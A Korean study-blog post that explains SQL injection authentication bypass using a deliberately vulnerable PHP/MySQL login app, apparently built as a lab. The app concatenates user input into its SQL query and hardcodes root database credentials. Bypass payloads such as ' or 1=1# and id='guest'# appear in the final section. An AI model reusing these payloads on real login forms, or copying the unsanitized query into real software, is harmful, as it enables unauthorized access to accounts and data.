์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

SQL Injection ์ธ์ฆ ์šฐํšŒ

  • -
๋ฐ˜์‘ํ˜•
<@
	JSP ์ฝ”๋“œ
@>

<?
	PHP ์ฝ”๋“œ
?>
// index.php
<?
    @session_start(); // php์—์„œ ์„ธ์…˜์„ ํ•ธ๋“ค๋ง
    header("Content-Type : text/html; charset=utf-8");

    // session์˜ id๊ฐ€ ๋น„์–ด์žˆ๋‹ค๋ฉด ๊ฒฝ๊ณ ์ฐฝ ๋„์šด ํ›„ ๋กœ๊ทธ์ธ ์ฐฝ์œผ๋กœ ์ด๋™
    if(empty($_SESSION["id"])){
        echo "<script>alert('๋กœ๊ทธ์ธ์ด ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค');
        location.href='login.php';
        </script>" ;
        exit();

    }

   // $var = 1;   // ๋ณ€์ˆ˜ ์„ ์–ธ์‹œ $ ๊ธฐํ˜ธ ์‚ฌ์šฉ
    //$test = 'test';
    //echo $ test // test ํ”„๋ฆฐํŠธ
?>

<h1>ํšŒ์› ์ „์šฉ ํŽ˜์ด์ง€ ์ž…๋‹ˆ๋‹ค. </h1>
<!-- session ๋ณ€์ˆ˜ ๊ฐ’ ๋ถˆ๋Ÿฌ์˜ค๊ธฐ -->
<p> <?=$_SESSION["id"]?>๋‹˜ ๋ฐ˜๊ฐ‘์Šต๋‹ˆ๋‹ค.</p>
<input type="button" onclick="location.href='logout.php'" value="logout">
# login.php
<?
    @session_start(); // php์—์„œ ์„ธ์…˜์„ ํ•ธ๋“ค๋ง
    header("Content-Type : text/html; charset=utf-8");
?>
<h2> ๋กœ๊ทธ์ธ ํŽ˜์ด์ง€์ž…๋‹ˆ๋‹ค. </h2>
<form action="loginAction.php" method="POST">
    <li>ID : <input type="text" name="id"></li>
    <li>PW : <input type="password" name="pw"></li>
</form>
# loginAction.php
<?
    @session_start(); // php์—์„œ ์„ธ์…˜์„ ํ•ธ๋“ค๋ง
    header("Content-Type : text/html; charset=utf-8");

    $db_conn = new mysqli("localhost","root","apmsetup","login");    // new mysqli (ip,์‚ฌ์šฉ์ž์ด๋ฆ„,pw,๊ฐ€์ ธ์˜ฌ db)

    $id=$_POST["id"];
    $pw=$_POST["pw"];

    $query = "SELECT * FROM member WHERE id='{$id}' and pw='{$pw}'";
    $tmp =$db_conn->query($query); // ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์— ์ ‘์†ํ•œ ํ›„ query๋กœ ๋‚ ๋ ค๋ผ
    $cnt = $tmp->num_rows;       // ๋ ˆ์ฝ”๋“œ์˜ ๊ฐœ์ˆ˜ ์„ธ๊ธฐ
    $user = $tmp->fetch_assoc();    // tmp์—์„œ ๋ฐ›์€ ๊ฒฐ๊ณผ ๊ฐ’์„ user์— ๋„ฃ๋Š”๋‹ค

    if($cnt == 0){
        echo "<script>alert('ID ํ˜น์€ PW๊ฐ€ ์ž˜๋ชป ๋˜์—ˆ์Šต๋‹ˆ๋‹ค');
                history.back(-1);
              </script>";
              exit();
    }
    $_SESSION["id"]=$user["id"];
    echo "<script>location.href='index.php';
          </script>";
?>
# logout.php
<?
    @session_start(); // php์—์„œ ์„ธ์…˜์„ ํ•ธ๋“ค๋ง
    header("Content-Type : text/html; charset=utf-8");
    session_destroy();

    echo"<script>
            location.href='login.php'
         </script>";

?>
์ธ์ฆ ์šฐํšŒ ๊ณต๊ฒฉ

์ธ์ฆ ๊ธฐ๋Šฅ์„ ์ˆ˜ํ–‰ํ•˜๋Š” ์›น ์–ดํ”Œ๋ฆฌ์ผ€์ด์…˜ [ ์„œ๋ฒ„ ์›นํŽ˜์ด์ง€ ]์— ๋Œ€ํ•ด

SQL๊ตฌ๋ฌธ[' or 1=1#]์„ ์‚ฝ์ž…ํ•จ์œผ๋กœ์จ ์ •์ƒ์ ์ธ ์ธ์ฆ ์—†์ด ์ ‘๊ทผํ•˜๋Š” ์ทจ์•ฝ์ 

 

๋กœ๊ทธ์ธ ๊ณต๊ฒฉ

SELECT * FROM member WHERE id='์ž…๋ ฅ ๊ฐ’' AND pw='์ž…๋ ฅ ๊ฐ’'

1. ์œ„ ๊ตฌ๋ฌธ์— ์‚ฌ์šฉ์ž ์ž…๋ ฅ๊ฐ’์„ ๋„ฃ๋Š”๋‹ค.

2. ํ•ด๋‹น ์ฟผ๋ฆฌ๊ฐ€ ๊ฒฐ๊ณผ๋ฅผ ๋ฐ˜ํ™˜ํ•˜๋Š”๋ฐ

2-1. ๋ ˆ์ฝ”๋“œ๊ฐ€ 0๊ฐœ ์ถœ๋ ฅ๋œ๋‹ค > ID์™€ PW๊ฐ€ ์ผ์น˜ํ•˜์ง€์•Š๋Š”๋‹ค.

2-2. ๋ ˆ์ฝ”๋“œ๊ฐ€ 1๊ฐœ ์ถœ๋ ฅ๋œ๋‹ค > ID์™€ PW๊ฐ€ ์ผ์น˜ํ•œ๋‹ค.

ํ•ต์‹ฌ : ๋ ˆ์ฝ”๋“œ๋ฅผ ์ถœ๋ ฅ์‹œํ‚ฌ ์ˆ˜ ์žˆ๋Š๋ƒ ์—†๋Š๋ƒ

 

์ •์ƒ์ ์œผ๋กœ admin์œผ๋กœ ์ ‘์†
์ธ์ฆ ์šฐํšŒ ๊ณต๊ฒฉ์‹œ ๋ณด์ด๋Š” ์•Œ๊ณ ๋ฆฌ์ฆ˜

์ธ์ฆ ์šฐํšŒ๋ฅผ ํ•˜๊ฒŒ ๋˜๋ฉด ์ตœ ์ƒ์œ„ ์•„์ด๋””๋ฅผ ๋ฝ‘์•„๋‚ธ๋‹ค.

๊ทธ๋ ‡๋‹ค๋ฉด Guest๋กœ ์ธ์ฆ์šฐํšŒ ๋กœ๊ทธ์ธ ํ•˜๋Š”๋ฒ•์€ ?

Guest๋กœ ๋œ ๋ ˆ์ฝ”๋“œ๋ฅผ ์ถœ๋ ฅํ•˜๊ธฐ๋งŒ ํ•˜๋ฉด ๋œ๋‹ค == Guest๊ฐ€ ์ตœ์ƒ๋‹จ์ด๋ฉด ๋œ๋‹ค.

SELECT * FROM member WHERE id='guest'#' and pw=''

SELECT * FROM tb_board WHERE idx=6 and password='๊ฑฐ์ง“' or 1=1 #

SELECT * FROM tb_board WHERE password='๊ฑฐ์ง“' or 1=1 #

SELECT * FROM tb_board WHERE 1 #

> ๋ชจ๋“  tb_board ์ถœ๋ ฅ > ๊ทธ์ค‘ ์ตœ์ƒ๋‹จ 1๋ฒˆ ํ…Œ์ด๋ธ” ์ถœ๋ ฅ

SELECT * FROM tb_board WHERE [idx=6 and password='๊ฑฐ์ง“'] or 1=1 #

SELECT * FROM tb_board WHERE '๊ฑฐ์ง“' or [1=1 and idx=6]

' or 1=1 and idx=6 #

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

SQL Injection ์‹ค์Šต  (0) 2022.07.08
CODE Injection  (0) 2022.07.07
SQL Injection - Error Based  (0) 2022.07.06
Oracle Blind Based  (0) 2022.07.06
ORACLE Union Based  (0) 2022.07.06
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.